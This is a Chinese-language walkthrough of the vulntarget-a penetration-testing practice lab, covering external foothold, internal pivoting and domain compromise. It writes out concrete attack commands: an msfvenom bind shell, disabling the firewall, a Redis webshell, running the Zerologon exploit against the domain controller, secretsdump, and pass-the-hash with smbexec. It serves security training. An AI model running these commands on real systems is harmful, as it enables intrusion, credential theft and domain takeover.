渗透靶场——vulntarget-a综合靶场
字数 1621 2025-08-24 16:48:15
Vulntarget-A 综合靶场渗透教学文档
靶场环境概述
-
Win7系统:
- 密码: admin
- 设置通达OA漏洞
- 入站规则开放80端口
- 存在永恒之蓝漏洞
- 网络配置: 动态外网IP(NAT模式), 静态内网IP
-
Win2016系统:
- 账号: vulntarget\win2016
- 密码: Admin#123
- 管理员(administrator)密码: Admin@123
- 已安装Redis(自启), Web环境(自启)
- 入站规则开放80端口
- 双静态内网IP
-
Win2019系统(域控):
- 密码: Admin@666
- 已安装: AD域、vmtools
- 已添加域成员
- 计算机名: win2019
- 静态IP设置
渗透测试流程
1. 外网打点
-
扫描发现目标:
- 使用Kali扫描同网段IP
- 发现靶机外网地址: 192.168.135.152
-
端口扫描:
- 使用kscan扫描发现开放80端口
- 识别为通达OA系统
-
利用通达OA漏洞:
- 使用工具获取cookie直接攻击
- 通过蚁剑连接获取shell
- 确认获得system权限
2. 内网信息收集
-
网络配置检查:
- 发现双网卡配置
- 内网网段: 192.168.135.x 和 10.0.20.x
-
使用fscan扫描内网:
- 发现永恒之蓝漏洞(MS17-010)
-
获取系统哈希:
- 利用hashdump获取当前用户hash
- 收集密码对内网其他主机进行密码喷洒攻击
3. 内网横向移动
-
建立路由:
- 使用MSF添加路由与10.0.20.x网段通信
route add 10.0.20.0 255.255.255.0 1 -
设置代理:
- 使用MSF建立socks代理
use auxiliary/server/socks_proxy set srvhost 127.0.0.1 run -
内网主机发现:
- 使用MSF的arp_scanner模块
use post/windows/gather/arp_scanner set session 1 set rhosts 10.0.20.1-254 run- 发现目标IP: 10.0.20.99
-
端口扫描:
- 使用proxychains配合nmap扫描
proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080- 发现开放80和6379(Redis)端口
-
Redis未授权访问利用:
- 连接Redis服务
proxychains redis-cli -h 10.0.20.99- 写入一句话木马
- 使用蚁剑连接(需在Kali中运行蚁剑并配置代理)
4. 域渗透
-
获取内网主机权限:
- 关闭目标防火墙
netsh firewall set opmode mode=disable- 生成正向连接payload
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f exe > shell.exe -
域内主机发现:
- 发现域控IP: 10.0.10.110
-
利用Zerologon漏洞(CVE-2020-1472):
- 准备impacket工具
git clone https://github.com/SecureAuthCorp/impacket cd impacket python3 -m pip install -r requirements.txt python3 -m pip install .- 下载并执行漏洞利用脚本
git clone https://github.com/dirkjanm/CVE-2020-1472.git cd CVE-2020-1472 proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110- 成功将域控密码置空
-
获取域管hash:
- 使用impacket的secretsdump
proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass- 获取到域管administrator的hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15::: -
横向移动:
- 使用impacket的smbexec进行横向移动
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
关键知识点总结
-
永恒之蓝利用:
- MSF模块: exploit/windows/smb/ms17_010_eternalblue
- 设置正确的rhost和lhost参数
-
内网代理配置:
- 使用MSF的socks_proxy模块
- 配合proxychains进行工具代理
-
Redis未授权访问:
- 直接连接redis-cli
- 写入webshell进行控制
-
Zerologon漏洞利用:
- 影响Windows Server 2008 R2至2019版本
- 可将域控密码置空
- 需配合impacket工具进行后续利用
-
横向移动技巧:
- 使用hash进行认证(pass-the-hash)
- impacket工具包中的smbexec、secretsdump等模块
注意事项
-
代理使用:
- proxychains仅对TCP流量有效
- UDP和ICMP流量无法代理转发
- 使用nmap时需添加-sT参数进行全连接扫描
-
内网主机连接:
- 内网主机通常不出网,需使用正向连接
- 需关闭目标防火墙或放行相应端口
-
工具准备:
- Kali中安装蚁剑需下载Linux版本
- impacket工具需提前安装依赖
-
漏洞利用顺序:
- 从外到内逐步渗透
- 先获取立足点,再收集信息,最后横向移动
通过本靶场的练习,可以全面掌握从外网打点到内网横向移动的完整渗透流程,特别是域环境的渗透技巧。